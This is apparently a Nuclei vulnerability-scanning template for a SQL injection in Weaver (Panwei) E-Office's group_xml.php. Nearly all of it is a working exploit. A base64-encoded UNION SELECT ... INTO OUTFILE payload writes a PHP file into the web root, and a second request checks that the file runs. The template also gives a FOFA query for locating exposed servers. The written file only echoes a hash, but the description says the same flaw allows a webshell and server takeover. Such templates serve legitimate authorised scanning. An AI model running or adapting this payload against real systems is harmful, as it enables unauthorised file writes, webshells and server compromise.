id: weaver-group-xml-sqli

info:
  name: OA E-Office group_xml.php - SQL Injection
  author: xc
  severity: critical
  description: |
    There is a SQL injection vulnerability in the Panwei OA E-Office group_xml.php file. Through the vulnerability, an attacker can write to the Webshell file to obtain server permissions.
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="泛微-EOffice"
  tags: weaver,e-office,oa,sqli
variables:
  filename: "{{to_lower(rand_base(5))}}"
  payload: "[group]:[1]|[groupid]:[1 union select '<?php echo md5(weaver);?>',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"

http:
  - raw:
      - |
        GET /inc/group_user_list/group_xml.php?par={{base64(payload)}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
      - |
        GET /{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "758058d8987e7a9ec723bcdbec6c407e"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022077648b155365e5062f6fae7f30ac8e55fb206c6ddcc3fff6410d06c4d8f98510022100a68ed8e143bd838c10ddf987e370bc070f45e91488cb7ba9caa4b06f630860be:922c64590222798bb761d5b6d8e72950
